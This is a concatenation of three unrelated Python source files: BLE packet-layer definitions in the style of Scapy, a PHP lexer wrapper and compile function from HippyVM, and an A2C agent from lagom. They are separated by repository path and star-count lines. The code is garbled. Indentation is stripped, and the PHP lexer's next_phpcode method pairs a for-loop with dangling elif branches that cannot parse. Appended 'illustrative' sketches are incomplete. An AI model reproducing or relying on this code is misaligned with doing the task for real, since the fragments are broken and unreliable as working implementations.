class BTLE_PPI(PPI_Element):
"""Cooked BTLE PPI header
See ``ppi_btle_t`` in
https://github.com/greatscottgadgets/libbtbb/blob/master/lib/src/pcap.c
"""
name = "BTLE PPI header"
fields_desc = [
ByteField("btle_version", 0),
# btle_channel is a frequency in MHz. Named for consistency with
# other users.
LEShortField("btle_channel", None),
ByteField("btle_clkn_high", None),
LEIntField("btle_clk_100ns", None),
SignedByteField("rssi_max", None),
SignedByteField("rssi_min", None),
SignedByteField("rssi_avg", None),
ByteField("rssi_count", None)
]
class BTLE_RF(Packet):
"""Cooked BTLE link-layer pseudoheader.
http://www.whiterocker.com/bt/LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR.html
"""
name = "BTLE RF info header"
fields_desc = [
ByteField("rf_channel", 0),
SignedByteField("signal", -128),
SignedByteField("noise", -128),
ByteField("access_address_offenses", 0),
XLEIntField("reference_access_address", 0),
FlagsField("flags", 0, -16, [
"dewhitened", "sig_power_valid", "noise_power_valid",
"decrypted", "reference_access_address_valid",
"access_address_offenses_valid", "channel_aliased",
"res1", "res2", "res3", "crc_checked", "crc_valid",
"mic_checked", "mic_valid", "res4", "res5"
])
]
class NORDIC_BLE(Packet):
"""Cooked Nordic BTLE link-layer pseudoheader.
"""
name = "BTLE Nordic info header"
fields_desc = [
ByteField("board", 0),
LEShortField("payload_len", None),
ByteField("protocol", 0),
LEShortField("packet_counter", 0),
ByteField("packet_id", 0),
ByteField("packet_len", 10),
ByteField("flags", 0),
ByteField("channel", 0),
ByteField("rssi", 0),
LEShortField("event_counter", 0),
LEIntField("delta_time", 0),
]
def post_build(self, p, pay):
if self.payload_len is None:
p = p[:1] + chb(len(pay) + 10) + p[2:]
return p + pay
##########
# Fields #
##########
class BDAddrField(MACField):
def __init__(self, name, default, resolve=False):
MACField.__init__(self, name, default)
if resolve:
conf.resolve.add(self)
def i2m(self, pkt, x):
if x is None:
return b"\0\0\0\0\0\0"
return mac2str(':'.join(x.split(':')[::-1]))
def m2i(self, pkt, x):
return str2mac(x[::-1])
class BTLEChanMapField(XByteField):
def __init__(self, name, default):
Field.__init__(self, name, default, "<Q")
def addfield(self, pkt, s, val):
return s + struct.pack(self.fmt, self.i2m(pkt, val))[:5]
def getfield(self, pkt, s):
return s[5:], self.m2i(pkt, struct.unpack(self.fmt, s[:5] + b"\x00\x00\x00")[0]) # noqa: E501
##########
# Layers #
##########
class BTLE(Packet):
name = "BT4LE"
fields_desc = [
XLEIntField("access_addr", 0x8E89BED6),
LEX3BytesField("crc", None)
]
@staticmethod
def compute_crc(pdu, init=0x555555):
def swapbits(a):
v = 0
if a & 0x80 != 0:
v |= 0x01
if a & 0x40 != 0:
v |= 0x02
if a & 0x20 != 0:
v |= 0x04
if a & 0x10 != 0:
v |= 0x08
if a & 0x08 != 0:
v |= 0x10
if a & 0x04 != 0:
v |= 0x20
if a & 0x02 != 0:
v |= 0x40
if a & 0x01 != 0:
v |= 0x80
return v
state = swapbits(init & 0xff) + (swapbits((init >> 8) & 0xff) << 8) + (
swapbits((init >> 16) & 0xff) << 16) # noqa: E501
lfsr_mask = 0x5a6000
for i in (orb(x) for x in pdu):
for j in range(8):
next_bit = (state ^ i) & 1
i >>= 1
state >>= 1
if next_bit:
state |= 1 << 23
state ^= lfsr_mask
return struct.pack("<L", state)[:-1]
def post_build(self, p, pay):
# Switch payload and CRC
crc = p[-3:]
p = p[:-3] + pay
p += crc if self.crc is not None else self.compute_crc(p[4:])
return p
def post_dissect(self, s):
self.raw_packet_cache = None # Reset packet to allow post_build
return s
def pre_dissect(self, s):
# move crc
return s[:4] + s[-3:] + s[4:-3]
def hashret(self):
return struct.pack("!L", self.access_addr)
class BTLE_ADV(Packet):
name = "BTLE advertising header"
fields_desc = [
BitEnumField("RxAdd", 0, 1, {0: "public", 1: "random"}),
BitEnumField("TxAdd", 0, 1, {0: "public", 1: "random"}),
BitField("RFU", 0, 2), # Unused
BitEnumField("PDU_type", 0, 4,
{0: "ADV_IND", 1: "ADV_DIRECT_IND", 2: "ADV_NONCONN_IND", 3: "SCAN_REQ", # noqa: E501
4: "SCAN_RSP", 5: "CONNECT_REQ", 6: "ADV_SCAN_IND"}), # noqa: E501
BitField("unused", 0, 2), # Unused
XBitField("Length", None, 6),
]
def post_build(self, p, pay):
p += pay
if self.Length is None:
if len(pay) > 2:
l_pay = len(pay)
else:
l_pay = 0
p = p[:1] + chb(l_pay & 0x3f) + p[2:]
if not isinstance(self.underlayer, BTLE):
self.add_underlayer(BTLE)
return p
class BTLE_DATA(Packet):
name = "BTLE data header"
fields_desc = [
BitField("RFU", 0, 3), # Unused
BitField("MD", 0, 1),
BitField("SN", 0, 1),
BitField("NESN", 0, 1),
BitEnumField("LLID", 0, 2, {1: "continue", 2: "start", 3: "control"}),
ByteField("len", None), # BLE 4.2 and upwards can use 1 entire byte for length
]
def post_build(self, p, pay):
if self.len is None:
p = p[:-1] + chb(len(pay))
return p + pay
def do_dissect_payload(self, s):
if s is not None:
cls = self.guess_payload_class(s)
try:
p = cls(s, _internal=1, _underlayer=self)
except KeyboardInterrupt:
raise
except Exception:
if conf.debug_dissector:
if issubtype(cls, Packet):
log_runtime.error("%s dissector failed" % cls.__name__)
else:
log_runtime.error("%s.guess_payload_class() returned [%s]" % (
self.__class__.__name__, repr(cls))) # noqa: E501
if cls is not None:
raise
p = conf.raw_layer(s, _internal=1, _underlayer=self)
self.add_payload(p)
class BTLE_EMPTY_PDU(Packet):
name = "Empty data PDU"
class BTLE_ADV_IND(Packet):
name = "BTLE ADV_IND"
fields_desc = [
BDAddrField("AdvA", None),
PacketListField("data", None, EIR_Hdr)
]
class BTLE_ADV_DIRECT_IND(Packet):
name = "BTLE ADV_DIRECT_IND"
fields_desc = [
BDAddrField("AdvA", None),
BDAddrField("InitA", None)
]
class BTLE_ADV_NONCONN_IND(BTLE_ADV_IND):
name = "BTLE ADV_NONCONN_IND"
class BTLE_ADV_SCAN_IND(BTLE_ADV_IND):
name = "BTLE ADV_SCAN_IND"
class BTLE_SCAN_REQ(Packet):
name = "BTLE scan request"
fields_desc = [
BDAddrField("ScanA", None),
BDAddrField("AdvA", None)
]
def answers(self, other):
return BTLE_SCAN_RSP in other and self.AdvA == other.AdvA
class BTLE_SCAN_RSP(Packet):
name = "BTLE scan response"
fields_desc = [
BDAddrField("AdvA", None),
PacketListField("data", None, EIR_Hdr)
]
def answers(self, other):
return BTLE_SCAN_REQ in other and self.AdvA == other.AdvA
class BTLE_CONNECT_REQ(Packet):
name = "BTLE connect request"
fields_desc = [
BDAddrField("InitA", None),
BDAddrField("AdvA", None),
# LLDATA
XLEIntField("AA", 0x00),
LEX3BytesField("crc_init", 0x0),
XByteField("win_size", 0x0),
XLEShortField("win_offset", 0x0),
XLEShortField("interval", 0x0),
XLEShortField("latency", 0x0),
XLEShortField("timeout", 0x0),
BTLEChanMapField("chM", 0),
BitField("SCA", 0, 3),
BitField("hop", 0, 5),
]
BTLE_Versions = {
6: '4.0',
7: '4.1',
8: '4.2',
9: '5.0',
10: '5.1',
}
BTLE_Versions_Supported_Opcode = {
'4.0': 0x0B,
}
BTLE_Corp_IDs = {
0xf: 'Broadcom Corporation',
0x59: 'Nordic Semiconductor ASA'
}
BTLE_CtrlPDU_optcode = {
0x00: 'LL_CONNECTION_UPDATE_REQ',
0x01: 'LL_CHANNEL_MAP_REQ',
0x02: 'LL_TERMINATE_IND',
0x03: 'LL_ENC_REQ',
0x04: 'LL_ENC_RES',
0x05: 'LL_START_ENC_REQ',
0x06: 'LL_START_ENC_RES',
0x07: 'LL_UNKNOWN_RSP',
0x08: 'LL_FEATURE_REQ',
0x09: 'LL_FEATURE_RSP', # OK
0x0A: 'LL_PAUSE_ENC_REQ',
0x0B: 'LL_PAUSE_ENC_RES',
0x0C: 'LL_VERSION_IND', # OK
0x0D: 'LL_REJECT_IND',
0x0E: 'LL_SLAVE_FEATURE_REQ',
0x0F: 'LL_CONNECTION_PARAM_REQ',
0x10: 'LL_CONNECTION_PARAM_RES',
0x14: 'LL_LENGTH_REQ',
0x15: 'LL_LENGTH_RSP',
}
class CtrlPDU(Packet):
name = "CtrlPDU"
fields_desc = [
ByteEnumField("optcode", 0, BTLE_CtrlPDU_optcode)
]
def do_dissect_payload(self, s):
if s is not None:
cls = self.guess_payload_class(s)
try:
p = cls(s, _internal=1, _underlayer=self)
except KeyboardInterrupt:
raise
except Exception:
if conf.debug_dissector:
if issubtype(cls, Packet):
log_runtime.error("%s dissector failed" % cls.__name__)
else:
log_runtime.error("%s.guess_payload_class() returned [%s]" % (
self.__class__.__name__, repr(cls))) # noqa: E501
if cls is not None:
raise
p = conf.raw_layer(s, _internal=1, _underlayer=self)
self.add_payload(p)
class LL_CONNECTION_UPDATE_REQ(Packet):
name = 'LL_CONNECTION_UPDATE_REQ'
fields_desc = [
XByteField("win_size", 0x0),
XLEShortField("win_offset", 0x0),
XLEShortField("interval", 0x0),
XLEShortField("latency", 0x0),
XLEShortField("timeout", 0x0),
XLEShortField("instant", 0x0),
]
class LL_CHANNEL_MAP_REQ(Packet):
name = 'LL_CHANNEL_MAP_REQ'
fields_desc = [
BTLEChanMapField("chM", 0),
XLEShortField("instant", 0x0),
]
class LL_TERMINATE_IND(Packet):
name = 'LL_TERMINATE_IND'
fields_desc = [
XByteField("code", 0x0),
]
class LL_ENC_REQ(Packet):
name = 'LL_ENC_REQ'
fields_desc = [
StrFixedLenField("rand", "", length=8),
StrFixedLenField("ediv", "", length=2),
StrFixedLenField("skdm", "", length=8),
StrFixedLenField("ivm", "", length=4),
]
class LL_ENC_RSP(Packet):
name = 'LL_ENC_RSP'
fields_desc = [
StrFixedLenField("skds", "", length=8),
StrFixedLenField("ivs", "", length=4),
]
class LL_PAUSE_ENC_REQ(Packet):
name = 'LL_PAUSE_ENC_REQ'
class LL_PAUSE_ENC_RSP(Packet):
name = 'LL_PAUSE_ENC_RSP'
class LL_START_ENC_REQ(Packet):
name = 'LL_START_ENC_REQ'
class LL_START_ENC_RSP(Packet):
name = 'LL_START_ENC_RSP'
class LL_UNKNOWN_RSP(Packet):
name = 'LL_UNKNOWN_RSP'
fields_desc = [
XByteField("code", 0x0),
]
class LL_FEATURE_REQ(Packet):
name = "LL_FEATURE_REQ"
fields_desc = [
FlagsField("feature_set", 0, -16, [ # 4.0
'le_encryption',
# 4.1
'conn_par_req_proc', 'ext_reject_ind', 'slave_init_feat_exch',
# 4.2
'le_ping',
'le_data_len_ext', 'll_privacy', 'ext_scan_filter',
# 5.0
'll_2m_phy', 'tx_mod_idx', 'rx_mod_idx', 'le_coded_phy',
'le_ext_adv', 'le_periodic_adv',
'ch_sel_alg', 'le_pwr_class']),
BitField("reserved", 0, 48),
]
class LL_FEATURE_RSP(Packet):
name = "LL_FEATURE_RSP"
fields_desc = [
FlagsField("feature_set", 0, -16, ['le_encryption', # 4.0
'conn_par_req_proc', 'ext_reject_ind', 'slave_init_feat_exch',
'le_ping', # 4.1
'le_data_len_ext', 'll_privacy', 'ext_scan_filter', # 4.2
'll_2m_phy', 'tx_mod_idx', 'rx_mod_idx', 'le_coded_phy',
'le_ext_adv', 'le_periodic_adv',
'ch_sel_alg', 'le_pwr_class']),
BitField("min_used_channels", 0, 1),
BitField("reserved", 0, 47),
]
class LL_VERSION_IND(Packet):
name = "LL_VERSION_IND"
fields_desc = [
ByteEnumField("version", 8, BTLE_Versions),
LEShortEnumField("Company", 0, BTLE_Corp_IDs),
XShortField("subversion", 0)
]
class LL_REJECT_IND(Packet):
name = "LL_REJECT_IND"
fields_desc = [
XByteField("code", 0x0),
]
class LL_SLAVE_FEATURE_REQ(Packet):
name = "LL_SLAVE_FEATURE_REQ"
fields_desc = [
FlagsField("feature_set", 0, -16, ['le_encryption', # 4.0
'conn_par_req_proc', 'ext_reject_ind', 'slave_init_feat_exch',
'le_ping', # 4.1
'le_data_len_ext', 'll_privacy', 'ext_scan_filter', # 4.2
'll_2m_phy', 'tx_mod_idx', 'rx_mod_idx', 'le_coded_phy',
'le_ext_adv', 'le_periodic_adv',
'ch_sel_alg', 'le_pwr_class']),
BitField("min_used_channels", 0, 1),
BitField("reserved", 0, 47),
]
class LL_LENGTH_REQ(Packet):
    name = 'LL_LENGTH_REQ'
fields_desc = [
XLEShortField("max_rx_bytes", 251),
XLEShortField("max_rx_time", 2120),
XLEShortField("max_tx_bytes", 251),
XLEShortField("max_tx_time", 2120),
]
class LL_LENGTH_RSP(Packet):
    name = 'LL_LENGTH_RSP'
fields_desc = [
XLEShortField("max_rx_bytes", 251),
XLEShortField("max_rx_time", 2120),
XLEShortField("max_tx_bytes", 251),
XLEShortField("max_tx_time", 2120),
]
# Advertisement (37-39) channel PDUs
bind_layers(BTLE, BTLE_ADV, access_addr=0x8E89BED6)
bind_layers(BTLE, BTLE_DATA)
bind_layers(BTLE_ADV, BTLE_ADV_IND, PDU_type=0)
bind_layers(BTLE_ADV, BTLE_ADV_DIRECT_IND, PDU_type=1)
bind_layers(BTLE_ADV, BTLE_ADV_NONCONN_IND, PDU_type=2)
bind_layers(BTLE_ADV, BTLE_SCAN_REQ, PDU_type=3)
bind_layers(BTLE_ADV, BTLE_SCAN_RSP, PDU_type=4)
bind_layers(BTLE_ADV, BTLE_CONNECT_REQ, PDU_type=5)
bind_layers(BTLE_ADV, BTLE_ADV_SCAN_IND, PDU_type=6)
# Data channel (0-36) PDUs
# LLID=1 -> Continue
bind_layers(BTLE_DATA, L2CAP_Hdr, LLID=2) # BTLE_DATA / L2CAP_Hdr / ATT_Hdr
bind_layers(BTLE_DATA, CtrlPDU, LLID=3) # BTLE_DATA / CtrlPDU
bind_layers(BTLE_DATA, BTLE_EMPTY_PDU, len=0) # BTLE_DATA / BTLE_EMPTY_PDU
bind_layers(CtrlPDU, LL_CONNECTION_UPDATE_REQ, optcode=0x00) # BTLE_DATA / CtrlPDU / LL_CONNECTION_UPDATE_REQ
bind_layers(CtrlPDU, LL_CHANNEL_MAP_REQ, optcode=0x01) # BTLE_DATA / CtrlPDU / LL_CHANNEL_MAP_REQ
bind_layers(CtrlPDU, LL_TERMINATE_IND, optcode=0x02) # BTLE_DATA / CtrlPDU / LL_TERMINATE_IND
bind_layers(CtrlPDU, LL_ENC_REQ, optcode=0x03) # BTLE_DATA / CtrlPDU / LL_ENC_REQ
bind_layers(CtrlPDU, LL_ENC_RSP, optcode=0x04) # BTLE_DATA / CtrlPDU / LL_ENC_RSP
bind_layers(CtrlPDU, LL_START_ENC_REQ, optcode=0x05) # BTLE_DATA / CtrlPDU / LL_START_ENC_REQ
bind_layers(CtrlPDU, LL_START_ENC_RSP, optcode=0x06) # BTLE_DATA / CtrlPDU / LL_START_ENC_RSP
bind_layers(CtrlPDU, LL_UNKNOWN_RSP, optcode=0x07) # BTLE_DATA / CtrlPDU / LL_UNKNOWN_RSP
bind_layers(CtrlPDU, LL_FEATURE_REQ, optcode=0x08) # BTLE_DATA / CtrlPDU / LL_FEATURE_REQ
bind_layers(CtrlPDU, LL_FEATURE_RSP, optcode=0x09) # BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU, LL_VERSION_IND, optcode=0x0C) # BTLE_DATA / CtrlPDU / LL_VERSION_IND
bind_layers(CtrlPDU, LL_REJECT_IND, optcode=0x0D) # BTLE_DATA / CtrlPDU / LL_REJECT_IND
bind_layers(CtrlPDU, LL_SLAVE_FEATURE_REQ, optcode=0x0E) # BTLE_DATA / CtrlPDU / LL_SLAVE_FEATURE_REQ
bind_layers(CtrlPDU, LL_LENGTH_REQ, optcode=0x14) # BTLE_DATA / CtrlPDU / LL_LENGTH_REQ
bind_layers(CtrlPDU, LL_LENGTH_RSP, optcode=0x15) # BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
bind_layers(CtrlPDU, LL_PAUSE_ENC_REQ, optcode=0x0A) # BTLE_DATA / CtrlPDU / LL_PAUSE_ENC_REQ
bind_layers(CtrlPDU, LL_PAUSE_ENC_RSP, optcode=0x0B) # BTLE_DATA / CtrlPDU / LL_PAUSE_ENC_RSP
# TODO: more optcodes
conf.l2types.register(DLT_BLUETOOTH_LE_LL, BTLE)
conf.l2types.register(DLT_BLUETOOTH_LE_LL_WITH_PHDR, BTLE_RF)
conf.l2types.register(DLT_NORDIC_BLE, NORDIC_BLE)
bind_layers(BTLE_RF, BTLE)
bind_layers(NORDIC_BLE, BTLE)
bind_layers(PPI_Hdr, BTLE_PPI, pfh_type=PPI_BTLE)
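# Illustrative usage sketch, not part of the original layer definitions:
# build a BTLE advertising frame, let BTLE.post_build() append the CRC-24
# via compute_crc(), and dissect it again. The advertiser address below is
# a made-up example value.
if __name__ == "__main__":
    _adv = (BTLE(access_addr=0x8E89BED6) / BTLE_ADV(TxAdd=1) /
            BTLE_ADV_IND(AdvA="11:22:33:44:55:66"))
    _raw = _adv.build()   # CRC is computed over the PDU during post_build()
    BTLE(_raw).show()     # pre_dissect() moves the trailing CRC back into place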
|
hippy/phpcompiler.py
|
jweinraub/hippyvm
| 289 |
84967
|
from rply.token import SourcePosition
from hippy.sourceparser import SourceParser, LexerWrapper, ParseError, get_lexer
from hippy.astcompiler import compile_ast
from rpython.rlib.objectmodel import we_are_translated
MODE_LITERAL = 0
MODE_EQUALSIGN = 1
MODE_PHPCODE = 2
class PHPLexerWrapper(LexerWrapper):
def __init__(self, source, filename="", interp=None):
self.lexer = get_lexer(we_are_translated())
self.source = source
self.startlineno = 0
self.startindex = 0
self.mode = MODE_LITERAL
self.filename = filename
self.heredoc_term = None
self.interp = interp
def next(self):
mode = self.mode
if mode == MODE_PHPCODE:
return self.next_phpcode()
elif mode == MODE_LITERAL:
return self.next_literal_mode()
elif mode == MODE_EQUALSIGN:
return self.next_equal_sign()
else:
assert 0
def next_literal_mode(self):
# "literal" mode, i.e. outside "<?php ?>" tags: generates
# one B_LITERAL_BLOCK until the next opening "<?php" tag
self.mode = MODE_PHPCODE
source = self.source
index = self.startindex
assert index >= 0
tagindex = source.find('<?', index)
if tagindex == -1:
tagindex = len(source)
assert tagindex >= 0
startindex = self.startindex
assert startindex >= 0
block_of_text = source[startindex:tagindex] # may be empty
source_pos = SourcePosition(self.startindex, self.startlineno + 1, 0)
tok = self.lexer.token_class('B_LITERAL_BLOCK', block_of_text, source_pos)
self.startlineno += block_of_text.count('\n')
if source[tagindex:tagindex+5].lower() == '<?php':
pos = tagindex + 5
elif source[tagindex:tagindex+3] == '<?=':
pos = tagindex + 3
self.mode = MODE_EQUALSIGN
else:
pos = tagindex + 2
self.lexer.input(self.source, pos, self.startlineno)
return tok
def next_equal_sign(self):
self.mode = MODE_PHPCODE
source_pos = SourcePosition(self.startindex, self.startlineno + 1, 0)
return self.lexer.token_class("T_ECHO", "echo", source_pos)
def next_phpcode(self):
        for tok in self.lexer.token():
            if tok is None:
                return None  # end of file
            # Lexer indexes lines from 0, humans from 1
            tok.source_pos.lineno += 1
elif tok.name == 'H_NEW_LINE':
continue # ignore these and continue
elif tok.name == 'H_TABULATURE':
continue # ignore these and continue
elif tok.name == 'H_WHITESPACE':
continue # ignore these and continue
elif tok.name == 'T_COMMENT':
# look for "?>" inside single-line comments too
if not tok.getstr().startswith('/*'):
i = tok.getstr().find('?>')
if i >= 0:
endpos = self.lexer.pos - len(tok.getstr()) + i + 2
return self.end_current_block(tok, endpos)
continue
elif tok.name == 'B_END_OF_CODE_BLOCK':
return self.end_current_block(tok, self.lexer.pos)
elif tok.name == 'T_HALT_COMPILER':
return self.do_halt_compiler()
else:
return tok # a normal php token
def end_current_block(self, tok, endpos):
# a "?>" marker that ends the current block of code
# generates a ";" token followed by a B_LITERAL_BLOCK
lineno = tok.source_pos.lineno
self.startlineno = lineno
self.startindex = endpos + 1
self.mode = MODE_LITERAL
if (self.startindex < len(self.source) and
self.source[self.startindex] == '\n'):
# self.startlineno += 1 # consume \n if immediately following
self.startindex += 1
return self.lexer.token_class(";", ";", SourcePosition(endpos, lineno, 0))
def do_halt_compiler(self):
for expecting in ['(', ')', ';']:
token = self.next()
if token is None or token.name != expecting:
raise ParseError('"__halt_compiler" not followed by "();"',
token.source_pos.lineno)
#
# hack: copies the end position to a constant
if self.interp is not None:
if self.interp.lookup_constant('__COMPILER_HALT_OFFSET__') is None:
if self.mode == MODE_LITERAL:
endpos = self.startindex
else:
endpos = self.lexer.pos + 1
w_end = self.interp.space.newint(endpos)
self.interp.declare_new_constant('__COMPILER_HALT_OFFSET__',
w_end)
#
return None
DEBUG = False
def compile_php(filename, source, space, interp=None):
"""Parse and compile a PHP file, starting in literal mode (i.e.
dumping all input directly) until the first '<?' or '<?php'.
Supports a mixture of blocks of code between the blocks of texts."""
phplexerwrapper = PHPLexerWrapper(source, filename, interp)
if DEBUG:
lst = []
while True:
tok = phplexerwrapper.next()
if tok is None:
break
else:
lst.append(tok)
print [x.__dict__ for x in lst]
phplexerwrapper = iter(lst + [None])
parser = SourceParser(space, None, filename=filename)
tokens = parser.parser.parse(phplexerwrapper, state=parser)
bc = compile_ast(filename, source, tokens, space)
return bc
|
legacy/a2c/agent.py
|
zuoxingdong/lagom
| 383 |
84991
|
<gh_stars>100-1000
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils import clip_grad_norm_
from lagom.networks import BaseNetwork
from lagom.networks import make_fc
from lagom.networks import ortho_init
from lagom.networks import linear_lr_scheduler
from lagom.policies import BasePolicy
from lagom.policies import CategoricalHead
from lagom.policies import DiagGaussianHead
from lagom.value_functions import StateValueHead
from lagom.transform import ExplainedVariance
from lagom.history.metrics import final_state_from_segment
from lagom.history.metrics import terminal_state_from_segment
from lagom.history.metrics import bootstrapped_returns_from_segment
from lagom.history.metrics import gae_from_segment
from lagom.agents import BaseAgent
class MLP(BaseNetwork):
def make_params(self, config):
self.feature_layers = make_fc(self.env_spec.observation_space.flat_dim, config['network.hidden_sizes'])
self.layer_norms = nn.ModuleList([nn.LayerNorm(hidden_size) for hidden_size in config['network.hidden_sizes']])
def init_params(self, config):
for layer in self.feature_layers:
ortho_init(layer, nonlinearity='leaky_relu', constant_bias=0.0)
def reset(self, config, **kwargs):
pass
def forward(self, x):
for layer, layer_norm in zip(self.feature_layers, self.layer_norms):
x = layer_norm(F.celu(layer(x)))
return x
class Critic(BaseNetwork):
def make_params(self, config):
self.feature_layers = make_fc(self.env_spec.observation_space.flat_dim, config['network.hidden_sizes'])
self.layer_norms = nn.ModuleList([nn.LayerNorm(hidden_size) for hidden_size in config['network.hidden_sizes']])
self.output_layer = StateValueHead(config, self.device, config['network.hidden_sizes'][-1])
def init_params(self, config):
for layer in self.feature_layers:
ortho_init(layer, nonlinearity='leaky_relu', constant_bias=0.0)
self.make_optimizer(config)
def make_optimizer(self, config, **kwargs):
self.optimizer = optim.Adam(self.parameters(), lr=config['algo.lr_V'])
if config['algo.use_lr_scheduler']:
if 'train.iter' in config:
self.lr_scheduler = linear_lr_scheduler(self.optimizer, config['train.iter'], 'iteration-based')
elif 'train.timestep' in config:
self.lr_scheduler = linear_lr_scheduler(self.optimizer, config['train.timestep']+1, 'timestep-based')
else:
self.lr_scheduler = None
def optimizer_step(self, config, **kwargs):
if config['agent.max_grad_norm'] is not None:
clip_grad_norm_(self.parameters(), config['agent.max_grad_norm'])
if self.lr_scheduler is not None:
if self.lr_scheduler.mode == 'iteration-based':
self.lr_scheduler.step()
elif self.lr_scheduler.mode == 'timestep-based':
self.lr_scheduler.step(kwargs['total_T'])
self.optimizer.step()
def reset(self, config, **kwargs):
pass
def forward(self, x):
for layer, layer_norm in zip(self.feature_layers, self.layer_norms):
x = layer_norm(F.celu(layer(x)))
x = self.output_layer(x)
return x
class Policy(BasePolicy):
def make_networks(self, config):
self.feature_network = MLP(config, self.device, env_spec=self.env_spec)
feature_dim = config['network.hidden_sizes'][-1]
if self.env_spec.control_type == 'Discrete':
self.action_head = CategoricalHead(config, self.device, feature_dim, self.env_spec)
elif self.env_spec.control_type == 'Continuous':
self.action_head = DiagGaussianHead(config,
self.device,
feature_dim,
self.env_spec,
min_std=config['agent.min_std'],
std_style=config['agent.std_style'],
constant_std=config['agent.constant_std'],
std_state_dependent=config['agent.std_state_dependent'],
init_std=config['agent.init_std'])
if not config['network.independent_V']:
self.V_head = StateValueHead(config, self.device, feature_dim)
def make_optimizer(self, config, **kwargs):
self.optimizer = optim.Adam(self.parameters(), lr=config['algo.lr'])
if config['algo.use_lr_scheduler']:
if 'train.iter' in config:
self.lr_scheduler = linear_lr_scheduler(self.optimizer, config['train.iter'], 'iteration-based')
elif 'train.timestep' in config:
self.lr_scheduler = linear_lr_scheduler(self.optimizer, config['train.timestep']+1, 'timestep-based')
else:
self.lr_scheduler = None
def optimizer_step(self, config, **kwargs):
if config['agent.max_grad_norm'] is not None:
clip_grad_norm_(self.parameters(), config['agent.max_grad_norm'])
if self.lr_scheduler is not None:
if self.lr_scheduler.mode == 'iteration-based':
self.lr_scheduler.step()
elif self.lr_scheduler.mode == 'timestep-based':
self.lr_scheduler.step(kwargs['total_T'])
self.optimizer.step()
@property
def recurrent(self):
return False
def reset(self, config, **kwargs):
pass
def __call__(self, x, out_keys=['action', 'V'], info={}, **kwargs):
out = {}
features = self.feature_network(x)
action_dist = self.action_head(features)
        action = action_dist.sample().detach()  # TODO: is detach() necessary here?
out['action'] = action
if 'V' in out_keys:
V = self.V_head(features)
out['V'] = V
if 'action_dist' in out_keys:
out['action_dist'] = action_dist
if 'action_logprob' in out_keys:
out['action_logprob'] = action_dist.log_prob(action)
if 'entropy' in out_keys:
out['entropy'] = action_dist.entropy()
if 'perplexity' in out_keys:
out['perplexity'] = action_dist.perplexity()
return out
class Agent(BaseAgent):
r"""Advantage Actor-Critic (A2C). """
def make_modules(self, config):
self.policy = Policy(config, self.env_spec, self.device)
if config['network.independent_V']:
self.critic = Critic(config, self.device, env_spec=self.env_spec)
def prepare(self, config, **kwargs):
self.total_T = 0
def reset(self, config, **kwargs):
pass
def choose_action(self, obs, info={}):
obs = torch.from_numpy(np.asarray(obs)).float().to(self.device)
if self.training:
if self.config['network.independent_V']:
out = self.policy(obs, out_keys=['action', 'action_logprob', 'entropy'], info=info)
out['V'] = self.critic(obs)
else:
out = self.policy(obs, out_keys=['action', 'action_logprob', 'V', 'entropy'], info=info)
else:
with torch.no_grad():
out = self.policy(obs, out_keys=['action'], info=info)
# sanity check for NaN
if torch.any(torch.isnan(out['action'])):
raise ValueError('NaN!')
return out
def learn(self, D, info={}):
logprobs = torch.stack([info['action_logprob'] for info in D.batch_infos], 1).squeeze(-1)
entropies = torch.stack([info['entropy'] for info in D.batch_infos], 1).squeeze(-1)
all_Vs = torch.stack([info['V'] for info in D.batch_infos], 1).squeeze(-1)
last_states = torch.from_numpy(final_state_from_segment(D)).float().to(self.device)
with torch.no_grad():
if self.config['network.independent_V']:
last_Vs = self.critic(last_states)
else:
last_Vs = self.policy(last_states, out_keys=['V'])['V']
Qs = bootstrapped_returns_from_segment(D, last_Vs, self.config['algo.gamma'])
Qs = torch.from_numpy(Qs.copy()).float().to(self.device)
if self.config['agent.standardize_Q']:
Qs = (Qs - Qs.mean(1, keepdim=True))/(Qs.std(1, keepdim=True) + 1e-8)
As = gae_from_segment(D, all_Vs, last_Vs, self.config['algo.gamma'], self.config['algo.gae_lambda'])
As = torch.from_numpy(As.copy()).float().to(self.device)
if self.config['agent.standardize_adv']:
As = (As - As.mean(1, keepdim=True))/(As.std(1, keepdim=True) + 1e-8)
assert all([x.ndimension() == 2 for x in [logprobs, entropies, all_Vs, Qs, As]])
policy_loss = -logprobs*As
policy_loss = policy_loss.mean()
entropy_loss = -entropies
entropy_loss = entropy_loss.mean()
value_loss = F.mse_loss(all_Vs, Qs, reduction='none')
value_loss = value_loss.mean()
entropy_coef = self.config['agent.entropy_coef']
value_coef = self.config['agent.value_coef']
loss = policy_loss + value_coef*value_loss + entropy_coef*entropy_loss
if self.config['agent.fit_terminal_value']:
terminal_states = terminal_state_from_segment(D)
if terminal_states is not None:
terminal_states = torch.from_numpy(terminal_states).float().to(self.device)
terminal_Vs = self.policy(terminal_states, out_keys=['V'])['V']
terminal_value_loss = F.mse_loss(terminal_Vs, torch.zeros_like(terminal_Vs))
terminal_value_loss_coef = self.config['agent.terminal_value_coef']
loss += terminal_value_loss_coef*terminal_value_loss
self.policy.optimizer.zero_grad()
if self.config['network.independent_V']:
self.critic.optimizer.zero_grad()
loss.backward()
self.policy.optimizer_step(self.config, total_T=self.total_T)
if self.config['network.independent_V']:
self.critic.optimizer_step(self.config, total_T=self.total_T)
self.total_T += D.total_T
out = {}
if self.policy.lr_scheduler is not None:
out['current_lr'] = self.policy.lr_scheduler.get_lr()
out['loss'] = loss.item()
out['policy_loss'] = policy_loss.item()
out['entropy_loss'] = entropy_loss.item()
out['policy_entropy'] = -entropy_loss.item()
out['value_loss'] = value_loss.item()
ev = ExplainedVariance()
ev = ev(y_true=Qs.detach().cpu().numpy().squeeze(), y_pred=all_Vs.detach().cpu().numpy().squeeze())
out['explained_variance'] = ev
return out
@property
def recurrent(self):
pass
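# Illustrative sketch, not part of the original agent: the loss combination
# used in Agent.learn(), spelled out with dummy tensors so the arithmetic is
# explicit. The 0.5/0.01 coefficients stand in for the config values
# 'agent.value_coef' and 'agent.entropy_coef'.
if __name__ == '__main__':
    _logprobs = torch.randn(4, 5)   # [num_envs, segment_length]
    _entropies = torch.rand(4, 5)
    _Vs = torch.randn(4, 5)
    _Qs = torch.randn(4, 5)
    _As = _Qs - _Vs.detach()        # simple advantage stand-in (learn() uses GAE)
    _policy_loss = (-_logprobs * _As).mean()
    _value_loss = F.mse_loss(_Vs, _Qs)
    _entropy_loss = (-_entropies).mean()
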